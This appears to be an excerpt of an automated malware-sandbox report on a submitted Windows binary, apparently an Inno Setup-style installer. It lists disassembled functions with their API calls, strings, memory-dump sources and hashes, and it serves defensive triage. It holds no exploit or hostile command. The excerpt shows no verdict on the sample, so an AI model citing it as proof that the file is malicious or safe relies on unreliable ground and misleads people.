                                                                                • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                                • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                                Function 004297DC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                                • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                                • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                                • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                                                • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                                • Opcode Fuzzy Hash: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                                                • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                                Function 0041BBC8 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                • 73E9A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                                • 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                                • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem$A570A6310DeleteObject
                                                                                • String ID:
                                                                                • API String ID: 3435189566-0
                                                                                • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                                • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                                Function 00473848 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0045D3B0: SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738D5
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738EB
                                                                                Strings
                                                                                • Failed to set permissions on registry key (%d)., xrefs: 004738FC
                                                                                • Could not set permissions on the registry key because it currently does not exist., xrefs: 004738DF
                                                                                • Setting permissions on registry key: %s\%s, xrefs: 0047389A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                • API String ID: 1452528299-4018462623
                                                                                • Opcode ID: 65c899866a6f92bdc558b75d1f6f5c8f40dffa86cd9e0ff42c768141b597e19f
                                                                                • Instruction ID: 0e56c8fb080e82cb73bff42131c1910bc7e2d1be1188aa0d4929b19add272574
                                                                                • Opcode Fuzzy Hash: 65c899866a6f92bdc558b75d1f6f5c8f40dffa86cd9e0ff42c768141b597e19f
                                                                                • Instruction Fuzzy Hash: D42186B0A046485FCB00DFA9C8816EEBBE5DF49315F50817BE508E7392D7B85A05CB6A
                                                                                Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocString
                                                                                • String ID:
                                                                                • API String ID: 262959230-0
                                                                                • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                Function 004143F0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • 73E98830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                                • 73E922A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                                • 73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                                • 73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                                • 73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: E922E98830$A480
                                                                                • String ID:
                                                                                • API String ID: 3692852386-0
                                                                                • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                                • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                                Function 00406FAC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                                • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                                • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Enum$NameOpenResourceUniversal
                                                                                • String ID: Z
                                                                                • API String ID: 3604996873-1505515367
                                                                                • Opcode ID: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                                                • Instruction ID: 2ace50d644c075eff23e32fa5e1ddfe03b8fa53596be5d4ceb5675c655e146ae
                                                                                • Opcode Fuzzy Hash: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                                                • Instruction Fuzzy Hash: C0513070E04218ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE418F5A
                                                                                Function 0044CFD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetRectEmpty.USER32(?), ref: 0044D05E
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D089
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D111
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: DrawText$EmptyRect
                                                                                • String ID:
                                                                                • API String ID: 182455014-2867612384
                                                                                • Opcode ID: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                                                • Instruction ID: 2c2bbb7fbf4b59eae95d31c7b28000ca71a9f0321ec4255fb332cd8a4a3f7a8e
                                                                                • Opcode Fuzzy Hash: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                                                • Instruction Fuzzy Hash: F6516071E00244AFDB10DFA5C885BDEBBF8AF49308F08847AE845EB255D778A945CB64
                                                                                Function 0042EF84 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • 73E9A570.USER32(00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EFAE
                                                                                  • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042EFD1
                                                                                • 73E9A480.USER32(00000000,?,0042F0BD,00000000,0042F0B6,?,00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000), ref: 0042F0B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                • String ID: ...\
                                                                                • API String ID: 2998766281-983595016
                                                                                • Opcode ID: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                                                • Instruction ID: 4ea51e63949933808241df29427b07dd96e06abf1a704ffa26f869fa6ec4a11f
                                                                                • Opcode Fuzzy Hash: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                                                • Instruction Fuzzy Hash: 2F315270B00128ABDF11EF96D841BAEB7B8EB48708FD1447BF410A7292D7785D49CA59
                                                                                Function 004538A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                                • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle
                                                                                • String ID: .tmp$_iu
                                                                                • API String ID: 3498533004-10593223
                                                                                • Opcode ID: dc109c8f01286b2989461901934a6d9e01325b966eab87418c3e389b569fc91a
                                                                                • Instruction ID: 4fa05f029f2566c48aedd37e5d2d112a05e3774389c58111587f2dbaaee79b9c
                                                                                • Opcode Fuzzy Hash: dc109c8f01286b2989461901934a6d9e01325b966eab87418c3e389b569fc91a
                                                                                • Instruction Fuzzy Hash: 9531A6B0A40149ABCF01EF95C982B9EBBB5AF44345F50452AF800B72C2D6785F058AAD
                                                                                Function 00416420 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                • RegisterClassA.USER32(?), ref: 004164DE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Class$InfoRegisterUnregister
                                                                                • String ID: @
                                                                                • API String ID: 3749476976-2766056989
                                                                                • Opcode ID: 8cb808bfaf21f9b6be1f4599df9655a946cb93d0bbb2725194c7e4a3bd3b9422
                                                                                • Instruction ID: 7ea39428e622c43f80c69b44bdb33f9ce6dea52ad5211df5dc1c1138561595a4
                                                                                • Opcode Fuzzy Hash: 8cb808bfaf21f9b6be1f4599df9655a946cb93d0bbb2725194c7e4a3bd3b9422
                                                                                • Instruction Fuzzy Hash: 0E318E706042009BD760EF68C981B9B77E5AB88308F04457FF985DB392DB39D9848B6A
                                                                                Function 00497BE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C50
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C79
                                                                                • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00497C92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: File$Attributes$Move
                                                                                • String ID: isRS-%.3u.tmp
                                                                                • API String ID: 3839737484-3657609586
                                                                                • Opcode ID: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                                                • Instruction ID: 213244b736f3eff521ec2db090c728ece63042f248bf50699bdf4cb02408e53f
                                                                                • Opcode Fuzzy Hash: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                                                • Instruction Fuzzy Hash: 53214171E14219AFCF05EFA9C881AAFBBB8AB44714F50453BB814B72D1D6385E018B69
                                                                                Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ExitMessageProcess
                                                                                • String ID: Error$Runtime error at 00000000
                                                                                • API String ID: 1220098344-2970929446
                                                                                • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                Function 00456A34 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A88
                                                                                • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456AB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                • String ID: LoadTypeLib$RegisterTypeLib
                                                                                • API String ID: 1312246647-2435364021
                                                                                • Opcode ID: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                                                • Instruction ID: 5567ca09ff2ddd9e87874ef4cfa4ab968baaa8f1c3db1669d027a8a21fc87fa6
                                                                                • Opcode Fuzzy Hash: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                                                • Instruction Fuzzy Hash: 20119331B00604AFDB11EFA6CD55A5EB7BDEB8A705B51C4B6BC04E3652DA389E04CB24
                                                                                Function 00456F8C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456FA6
                                                                                • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00457043
                                                                                Strings
                                                                                • Failed to create DebugClientWnd, xrefs: 0045700C
                                                                                • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                • API String ID: 3850602802-3720027226
                                                                                • Opcode ID: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                                                • Instruction ID: 61f5065308a022425a12d25e559eb7300ab1b4b0d104b50eccf394a1c4e119f6
                                                                                • Opcode Fuzzy Hash: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                                                • Instruction Fuzzy Hash: 921123706082509BD300AB689C82B5F7BD89B55719F45403BF9859B3C3D7798C08C7AE
                                                                                Function 00495D70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000,00495E13), ref: 00495DDE
                                                                                • CloseHandle.KERNEL32(x^I,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000), ref: 00495DF5
                                                                                  • Part of subcall function 00495CC8: GetLastError.KERNEL32(00000000,00495D60,?,?,?,?), ref: 00495CEC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
